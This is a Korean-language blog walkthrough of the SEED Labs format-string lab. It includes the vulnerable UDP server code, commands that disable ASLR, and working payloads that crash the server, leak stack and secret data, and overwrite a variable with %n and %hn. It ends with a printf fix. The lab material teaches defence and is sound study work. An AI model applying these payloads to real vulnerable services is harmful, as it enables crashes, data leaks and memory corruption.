본문으로 바로가기

SEEDLAB Chap 6: Format String Vulnerability Lab

category SEEDLAB 2021. 1. 28. 22:59

"Computer & Internet security : A Hand-on Approach" 서적의 내용 중 System security에 관련된 내용을 기술한다.

 

본 블로그에서는 6장 "Format String vulnerability"에 대한 실습 내용을 풀이한다.

 

SEEDLAB에서 제공하는 실습 task 중 유의미한 task들에 대해서만 풀이를 진행한다.

 

Disable the mitigaitons

Task들을 시작하기 전에 최근 Ubuntu에서 동작하는 mitigation인 KASLR을 disable 해야한다.


Format string vulnerability를 exploit하기 위해서 반드시 KASLR을 disable 해야하는 것은 아니지만, 실험의 편의를 위해 disable한다.

 

$ sudo sysctl -w kernel.randomize_va_space=0

 

Task 1: The Vulnerable Program

 

You are given a vulnerable program that has a format string vulnerability. This program is a server program. When it runs, it listens to UDP port 9090. Whenever a UDP packet comes to this port, the program get the data and invokes myprintf() to print out the data. The server is a root daemon, i.e., it runs with the root privilege. Inside the myprintf() function, there is a format string vulnerability. We will exploit this vulnerability to gain the root privilege.



  1 #include <stdio.h>
  2 #include <stdlib.h>
  3 #include <unistd.h>
  4 #include <string.h>
  5 #include <sys/socket.h>
  6 #include <netinet/ip.h>
  7 
  8 #define PORT 9090
  9 
 10 /* Changing this size will change the layout of the stack.
 11  * We have added 2 dummy arrays: in main() and myprintf().
 12  * Instructors can change this value each year, so students 
 13  * won't be able to use the solutions from the past.   
 14  * Suggested value: between 0 and 300  */
 15 #ifndef DUMMY_SIZE
 16 #define DUMMY_SIZE 100
 17 #endif
 18 
 19 char *secret = "A secret message\n";
 20 unsigned int  target = 0x11223344;
 21 
 22 void myprintf(char *msg)
 23 {
 24     uintptr_t framep;
 25     // Copy the ebp value into framep, and print it out
 26     asm("movl %%ebp, %0" : "=r"(framep));
 27     printf("The ebp value inside myprintf() is: 0x%.8x\n", framep);
 28 
 29     /* Change the size of the dummy array to randomize the parameters 
 30        for this lab. Need to use the array at least once */
 31     char dummy[DUMMY_SIZE];  memset(dummy, 0, DUMMY_SIZE);
 32 
 33     // This line has a format-string vulnerability
 34     printf(msg);
 35     printf("The value of the 'target' variable (after): 0x%.8x\n", target);
 36 }
 37 
 38 /* This function provides some helpful information. It is meant to
 39  *   simplify the lab tasks. In practice, attackers need to figure
 40  *   out the information by themselves. */
 41 void helper()
 42 {
 43     printf("The address of the secret: 0x%.8x\n", (unsigned) secret);
 44     printf("The address of the 'target' variable: 0x%.8x\n",
 45             (unsigned) &target);
 46     printf("The value of the 'target' variable (before): 0x%.8x\n", target);
 47 }
 48 
 49 void main()
 50 {
 51     struct sockaddr_in server;
 52     struct sockaddr_in client;
 53     int clientLen;
 54     char buf[1500];
 55 
 56     /* Change the size of the dummy array to randomize the parameters 
 57        for this lab. Need to use the array at least once */
 58     char dummy[DUMMY_SIZE];  memset(dummy, 0, DUMMY_SIZE);
 59 
 60     printf("The address of the input array: 0x%.8x\n", (unsigned) buf);
 61 
 62     helper();
 63 
 64     int sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
 65     memset((char *) &server, 0, sizeof(server));
 66     server.sin_family = AF_INET;
 67     server.sin_addr.s_addr = htonl(INADDR_ANY);
 68     server.sin_port = htons(PORT);
 69 
 70     if (bind(sock, (struct sockaddr *) &server, sizeof(server)) < 0)
 71         perror("ERROR on binding");
 72 
 73     while (1) {
 74         bzero(buf, 1500);
 75         recvfrom(sock, buf, 1500-1, 0,
 76                  (struct sockaddr *) &client, &clientLen);
 77         myprintf(buf);
 78     }
 79     close(sock);
 80 }

 

코드 설명은 다음과 같다.

 

Line 51-52: sockadd_in 구조체는 IPv4 주소를 저장하는 구조체이다.

 

Line 53-54: 추후 사용될 recvfrom 함수를 위해 변수를 선언한다.

 

Line 58: dummy 배열을 선언하고 dummy 배열의 모든 element를 0으로 초기화한다.

 

Line 60: buf 배열의 주소를 출력한다.

 

Line 62, 41-47: helper() 함수를 호출하여 secret이 포함하고 있는 문자열의 주소와 target 변수의 주소와 값을 출력한다.

 

Line 64: AF_INET(IPv4)를 사용하고 SOCK_DGRAM(UDP)를 사용하며, IPROTO_UDP를 사용한다. socket()의 반환 값은

socket descripter이고 socket을 생성한다.

 

Line 65: sockaddr_in 구조체인 server 변수를 0으로 초기화한다.

 

Line 66-68: server의 network type과 ip주소, port를 지정해준다. INADDR_ANY을 서버의 IP주소를 자동 할당한다. htonl() 함수는 "host to network long" 의 약어로 host가 network로 long 크기의 데이터를 보낼 때 바이트 order를 바꿔준다. htons() 함수는 "network to network short"는 short 크기의 데이터를 보낼 때 바이트 order를 변경해준다.

 

 

struct sockaddr_in {
        short   sin_family;
        u_short sin_port;
        struct  in_addr sin_addr;
        char    sin_zero[8];
};

 

Line 70-71: bind() 함수를 이용하여 socket과 server의 정보를 묶어준다. 

 

Line 73-78: bzero() 함수를 이용해 buf 변수를 0으로 초기화한다. recvfrom() 함수를 이용해 socket으로 들어온 데이터 1499 byte까지 읽어들여 buf에 저장하고, myprint 함수를 호출한다.

 

 

Compilation. Compile the above program. You will receive a warning message. This warning message is a countermeasure implemented by the gcc compiler against format string vulnerabilities. We can ignore this warning message for now.

 

$ gcc -z execstack -o server server.c 
server.c: In function ‘myprintf’:
server.c:34:5: warning: format not a string literal and no format arguments [-Wformat-security]
     printf(msg);
     ^

It should be noted that the program needs to be compiled using the "-z execstack" option, which allows the stack to be executable. This option has no impact on Tasks 1 to 5, but for Tasks 6 and 7, it is important. In these two tasks, we need to inject malicious code into this server program’s stack space; if the stack is not executable, Tasks 6 and 7 will fail. Non-executable stack is a countermeasure against stackbased code injection attacks, but it can be defeated using the return-to-libc technique. To simplify this lab, we simply disable this defeat-able countermeasure.

 

Running and testing the server. The ideal setup for this lab is to run the server on one VM, and then launch the attack from another VM. However, it is acceptable if students use one VM for this lab. On the server VM, we run our server program using the root privilege. We assume that this program is a privileged root daemon. The server listens to port 9090. On the client VM, we can send data to the server using the nc command, where the flag "-u" means UDP (the server program is a UDP server). The IP address in the following example should be replaced by the actual IP address of the server VM, or 127.0.0.1 if the client and server run on the same VM.

 

// On the server VM
$ sudo ./server

// On the client VM: send a "hello" message to the server
$ echo hello | nc -u 127.0.0.1 9090

// On the client VM: send the content of badfile to the server
$ nc -u 127.0.0.1 9090 < badfile

Yon can send any data to the server. The server program is supposed to print out whatever is sent by you. However, a format string vulnerability exists in the server program’s myprintf() function, which allows us to get the server program to do more than what it is supposed to do, including giving us a root access to the server machine. In the rest of this lab, we are going to exploit this vulnerability.

 

결과화면은 다음과 같다.

 

// server
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
hello

Task 2: Understanding the Layout of the Stack

 

To succeed in this lab, it is essential to understand the stack layout when the printf() function is invoked inside myprintf(). Figure 1 depicts the stack layout. You need to conduct some investigation and calculation. We intentionally print out some information in the server code to help simplify the investigation. Based on the investigation, students should answer the following questions:

 

• Question 1: What are the memory addresses at the locations marked by 1, 2, and 3?
• Question 2: What is the distance between the locations marked by 1 and 3?

 

1번의 주소 즉, format string의 주소를 알기 위해서 여러개의 %x를 사용하여 buffer의 시작주소를 찾으면 된다.

 

 

client의 badfile의 내용을 다음과 같이 설정하고 nc 명령어를 통해 server에게 udp 패킷을 전송한다.

 

Server는 Client가 보낸 문자열을 format string으로 인식하여 다음과 같은 결과 화면을 보여준다.

 

'@' 문자는 아스키 코드로 0x40이고, buf 변수의 가장 처음 4byte를 차지하고 있다. 따라서 %.8x format specifier로 여러번 stack 영역을 조사했을 때 총 79개의 %.8x가 필요한것을 확인하였다.

 

Task 3: Crash the Program

The objective of this task is to provide an input to the server, such that when the server program tries to print out the user input in the myprintf() function, it will crash.

 

client $ echo %s%s%s%s%s%s%s | nc -u 127.0.0.1 9090
server $
Segmentation fault

 

즉, va_list 가 가리키는 주소를 string으로 인식하여 NULL 문자를 만날 때까지 읽기 때문에 inaccessible한 address에 access하게 되면 segmentation fault가 발생한다.

 

 

Task 4: Print out the Server Program's Memory

 

The objective of this task is to get the server to print out some data from its memory. The data will be printed out on the server side, so the attacker cannot see it. Therefore, this is not a meaningful attack, but the technique used in his task will be essential for the subsequent tasks.

 

• Task 4.A: Stack Data. The goal is to print out the data on the stack (any data is fine). How many
format specifiers do you need to provide so you can get the server program to print out the first four
bytes of your input via a %x?

 

-> 앞선 Task3에서 실험한 것처럼 79개의 %x가 필요하다.

$%80$8x를 통해 va_list의 80번째 argument에 접근해 8자리수로 출력한다.

// server
$ python -c 'print "@@@@%80$8x"' > badfile
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
@@@@40404040
The value of the 'target' variable (after): 0x11223344

// client
$ nc -u 127.0.0.1 9090  < badfile


• Task 4.B: Heap Data. There is a secret message stored in the heap area, and you know its address;
your job is to print out the content of the secret message. To achieve this goal, you need to place
the address (in the binary form) of the secret message in your input (i.e., the format string), but it is
difficult to type the binary data inside a terminal. We can use the following commands do that.

 

-> Task 4.A와 마찬가지로 payload 길이를 줄이기 위해 %k$s 형태의 shorted format string을 사용하면 된다.

다음과 같이 secret 변수의 주소를 little endian으로 기입하면 충분하다.

//server
[02/02/21]seed@VM:~/.../format_string$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
p�A secret message

The value of the 'target' variable (after): 0x11223344

// client
$ python -c 'print "\x70\x88\x04\x08%80$s"' > badfile 
$ nc -u 127.0.0.1 9090  < badfile

 

다음과 같은 표현도 가능하지만 buf[1500]의 offset 위치를 알고 있기 때문에 %k$[format specifier] 형식을 사용하는 것이 훨씬 쉽다.

$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x | nc -u 10.0.2.5 9090

// Or we can save the data in a file
$ echo $(printf "\x04\xF3\xFF\xBF")%.8x%.8x > badfile
$ nc -u 10.0.2.5 9090 < badfile

 

It should be noted that most computers are little-endian machines, so to store an address 0xAABBCCDD (four bytes on a 32-bit machine) in memory, the least significant byte 0xDD is stored in the lower address, while the most significant byte 0xAA is stored in the higher address. Therefore, when we store the address in a buffer, we need to save it using this order: 0xDD, 0xCC, 0xBB, and then 0xAA.

 

Task 5: Change the Server Program's Memory

 

The objective of this task is to modify the value of the target variable that is defined in the server program. Its original value is 0x11223344. Assume that this variable holds an important value, which can affect the control flow of the program. If remote attackers can change its value, they can change the behavior of this program. We have three sub-tasks.

 

• Task 5.A: Change the value to a different value. In this sub-task, we need to change the content of the target variable to something else. Your task is considered as a success if you can change it to a different value, regardless of what value it may be.

 

'target' 변수의 값을 0x123으로 바꾸기 위한 작업이다.

// Server
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
D�00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
The value of the 'target' variable (after): 0x00000123

// client
$ python -c 'print  "\x44\xa0\x04\x08%.287x%80$n"' > badfile 
$ nc -u 127.0.0.1 9090  < badfile

 

• Task 5.B: Change the value to 0x500. In this sub task, we need to change the content of the target variable to a specific value 0x500. Your task is considered as a success only if the variable’s value becomes 0x500.

 

// Server

$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
D�0000000000000000000000000000 ... (more zeros) ... 0000000000000000000000000
The value of the 'target' variable (after): 0x00000500

// Client
$ python -c 'print  "\x44\xa0\x04\x08%.1276x%80$n"' > badfile 
$ nc -u 127.0.0.1 9090  < badfile

Task 5.C: Change the value to 0xFF990000. This sub-task is similar to the previous one, except that the target value is now a large number. In a format string attack, this value is the total number of characters that are printed out by the printf() function; printing out this large number of characters may take hours. You need to use a faster approach. The basic idea is to use %hn, instead of %n, so we can modify a two-byte memory space, instead of four bytes. Printing out 216 characters does not take much time. We can break the memory space of the target variable into two blocks of memory, each having two bytes. We just need to set one block to 0xFF99 and set the other one to 0x0000. This means that in your attack, you need to provide two addresses in the format string.

In format string attacks, changing the content of a memory space to a very small value is quite challenging (please explain why in the report); 0x00 is an extreme case. To achieve this goal, we need to use an overflow technique. The basic idea is that when we make a number larger than what the storage allows, only the lower part of the number will be stored (basically, there is an integer overflow). For example, if the number 216 + 5 is stored in a 16-bit memory space, only 5 will be stored. Therefore, to get to zero, we just need to get the number to 216 = 65,536.

 

우선 0xFF99와 0x10000 두 부분으로 나눠야한다.

little endian 방식을 사용하기 때문에 0x0804a046에는 0xFF99, 0x0804a644에는 103을 추가로 더해서 구성한다.

 

0xFF99 - 0x8 = 0xFF91 = 65425 (0x0804a046)

0x10000 - 0xFF91 - 0x8 = 0x67 = 103 (0x0804a644)

 

// Server
$ ./server 
The address of the input array: 0xbfffe680
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5d8
D�0000000000000000000000000000 ... (more zeros) ... 0000000000000000000000000
The value of the 'target' variable (after): 0xff990000

// client
$ python -c 'print "\x46\xa0\x04\x08\x44\xa0\x04\x08%65425x%80$hn%103x%81$hn"' > badfile
$ nc -u 127.0.0.1 9090  < badfile

 

 

Task 8: Fixing the Problem

 

Remember the warning message generated by the gcc compiler? Please explain what it means. Please fix the vulnerability in the server program, and recompile it. Does the compiler warning go away? Do your attacks still work? You only need to try one of your attacks to see whether it still works or not.

 

현재 server.c를 compile하면 다음과 같은 warning이 발생한다.

 

$ !gcc
gcc -z execstack -o server server.c
server.c: In function ‘myprintf’:
server.c:34:5: warning: format not a string literal and no format arguments [-Wformat-security]
     printf(msg);
     ^

 

 

따라서 다음과 같이 방어할 수 있다.

 

// secure_server.c

 22 void myprintf(char *msg)
 23 {
 24     uintptr_t framep;
 25     // Copy the ebp value into framep, and print it out
 26     asm("movl %%ebp, %0" : "=r"(framep));
 27     printf("The ebp value inside myprintf() is: 0x%.8x\n", framep);
 28 
 29     /* Change the size of the dummy array to randomize the parameters 
 30        for this lab. Need to use the array at least once */
 31     char dummy[DUMMY_SIZE];  memset(dummy, 0, DUMMY_SIZE);
 32 
 33     // This line has a format-string vulnerability
 34	// printf(msg);
 35     printf("%s", msg);
 36     printf("The value of the 'target' variable (after): 0x%.8x\n", target);
 37 }

line 34를 line 34로 바꾸어 user가 format specifier를 작성하지 못하도록 변경할 수 있다.

 

결과값은 다음과 같다.

 

$ ./secure_server 
The address of the input array: 0xbfffe660
The address of the secret: 0x08048870
The address of the 'target' variable: 0x0804a044
The value of the 'target' variable (before): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5b8
hello
The value of the 'target' variable (after): 0x11223344
The ebp value inside myprintf() is: 0xbfffe5b8
F�D�%65425x%80$hn%103x%81$hn
The value of the 'target' variable (after): 0x11223344
^C

 

Format string vulnerability를 방어하기 위해서 Developer의 노력 혹은 Compiler의 경고 능력, ASLR, NX bit 설정 등이 요구 된다.